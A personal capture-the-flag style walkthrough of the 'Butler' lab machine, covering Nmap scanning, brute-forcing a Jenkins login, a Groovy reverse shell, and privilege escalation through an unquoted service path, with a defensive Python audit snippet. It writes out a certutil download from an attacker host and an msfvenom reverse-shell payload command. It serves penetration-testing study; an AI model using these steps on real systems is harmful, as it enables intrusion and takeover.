Butler box — Walkthrough

Cursemagic
5 min read · Dec 16, 2023

Hi guys, it has been a long time since my last write-up. I will be starting again, and I hope I can keep it going!

This is also a starting point of my journey to OSCP! Wish me luck!

So, today I would like to work on the Butler machine, which many of you know already. But it is a start for me! Let’s get started!

###############################################################

Some people might face issues finding their boxes from Kali (or whatever distro you are using); you can try the steps below in Oracle VM:

  1. Click Tools.
  2. Click NAT Networks and click Create.
  3. Click Apply below. The IPv4 settings usually work fine by default.
  4. Then choose “NAT Network” in the network field of the VM.

Disclaimer: It works fine for me on some boxes, but others still cannot be found. Still, it is worth a try.

###############################################################

Enumeration

Firstly, you can check your IP on your attacker machine.

Then, to locate the Butler box:

As you can see, 10.0.2.80 was found. Let’s ping it.

Now, scan the machine with Nmap. I usually use -oN to save the results to a text file, as we do not want to re-run the scan and wait again if we accidentally lose them.

nmap VICTIM_IP -sV -T4 -p- -A -oN <file_name>

Port 8080

Once we browse to it, we see the page below (Welcome to Jenkins! — yes, I am welcomed):

Tried admin:admin; it failed. Who knows, right?

I did find some interesting exploits while searching “Jetty 9” with searchsploit, but I am not sure whether we are going to be using them later.

But after checking the possible exploits, I can’t find a single one that suits this scenario (I might have missed something, or I really did miss something). So, maybe brute force will work?

So, I launched Burp and sent the request to Intruder. I will be using Cluster bomb since I have no idea about the username or the password. Remember to add §§ around the fields you want to “bomb”.

For the list, I would try some default usernames and passwords first before going BIG with something like rockyou.txt. A Google search got me this.

So, maybe Jenkins and admin? Let’s try.

Ok, failed. But let’s try other variations of it.

And we get it.

Now log in.

Usually for Jenkins, I go for the Script Console, which is located at the bottom of the page when you click “Manage Jenkins”.

Get a reverse shell for Groovy, as the console states it runs Groovy Script.

Paste it into the console. Remember to start your Netcat listener on your attacker machine before running the script.

Voila! We get it!

Find Something Useful?

Now we have access as jenkins.

Get winpeas.exe from our machine onto the victim machine. First, set up a simple HTTP server on your attacker machine.

python3 -m http.server <PORT>

Then, on the victim side, download winpeas.exe.

certutil -urlcache -f http://<ATTACKER_IP>:<PORT>/winPEASany.exe winpeas.exe

Then, run winpeas.exe and wait for the results.

After a long wait, we have our results. Then another 30 minutes of scrolling through them and checking every line highlighted in red. I saw one thing that might be useful.

It stated “No quotes and Space detected”. This is what we call an “Unquoted Service Path”: when a service’s binary path is not quoted and contains spaces, Windows tries each space-separated prefix of the path with “.exe” appended until it finds one that exists. Therefore, we can place an exe file at one of those prefixes and let the system trigger our payload when the service starts. For more information on Unquoted Service Paths, you can read the HackTricks page.

Link to HackTricks: https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#unquoted-service-paths
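The check winPEAS reported here, as an added audit example (my code, not the write-up’s and not winPEAS): it parses sc qc-style output (the sample below is constructed, with hypothetical service names) and lists, for each unquoted path containing spaces, the lookalike paths Windows would try before the real binary.

```python
import re
from typing import Dict, List

# Constructed sc qc-style output for three hypothetical services (not from the box).
SAMPLE_SC_QC = r"""
SERVICE_NAME: QuotedSvc
        BINARY_PATH_NAME   : "C:\Program Files\Good Vendor\good.exe" --run
SERVICE_NAME: Spooler
        BINARY_PATH_NAME   : C:\Windows\System32\spoolsv.exe
SERVICE_NAME: ExampleSvc
        BINARY_PATH_NAME   : C:\Program Files\Example Vendor\Example Service\svc.exe -service
"""

def parse_sc_qc(text: str) -> Dict[str, str]:
    """Map each SERVICE_NAME to its BINARY_PATH_NAME from concatenated sc qc dumps."""
    services: Dict[str, str] = {}
    current = None
    for line in text.splitlines():
        name = re.match(r"\s*SERVICE_NAME:\s*(\S+)", line)
        if name:
            current = name.group(1)
            continue
        path = re.match(r"\s*BINARY_PATH_NAME\s*:\s*(.+?)\s*$", line)
        if path and current:
            services[current] = path.group(1)
    return services

def hijack_candidates(binary_path: str) -> List[str]:
    r"""Lookalike paths Windows tries before the real executable (empty if safe).
    CreateProcess splits an unquoted command line at each space, so
    C:\Program Files\Sub Dir\app.exe is tried as C:\Program.exe, then
    C:\Program Files\Sub.exe, and only then the intended file."""
    if binary_path.startswith('"'):
        return []                      # quoted: only the quoted file is tried
    idx = binary_path.lower().find(".exe")
    exe = binary_path if idx < 0 else binary_path[: idx + 4]   # drop arguments
    if " " not in exe:
        return []                      # no space in the path: nothing to confuse
    parts = exe.split(" ")
    return [" ".join(parts[:i]) + ".exe" for i in range(1, len(parts))]

def audit(text: str) -> Dict[str, List[str]]:
    """Service name -> lookalike paths, for every service with an unquoted spaced path."""
    findings: Dict[str, List[str]] = {}
    for name, path in parse_sc_qc(text).items():
        candidates = hijack_candidates(path)
        if candidates:
            findings[name] = candidates
    return findings
```

Quoting the BINARY_PATH_NAME, or keeping the listed directories writable only by administrators, makes the finding go away.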

ROAD TO ADMIN!

Create our payload using msfvenom.

msfvenom -p windows/x64/shell_reverse_tcp LHOST=<ATTACKER_IP> LPORT=<PORT> -f exe -o Wise.exe

Download it to the victim and put it on the “path”.

Then check the service using sc qc.

We will need to restart the service manually to trigger our payload. But remember to set up a listener first!

Once we start it back up, we receive a connection, and it is nt authority\system!

We rooted the system!

Thank you for reading my write-up. I would like to improve my write-up skills in the future; you can reach me through Twitter or the comments. Any sponsors are also welcome.

Twitter: https://twitter.com/curse_jk

Buy me a coffee: http://buymeacoffee.com/Cursemagic

Other medium write-ups: https://cursemagic.medium.com
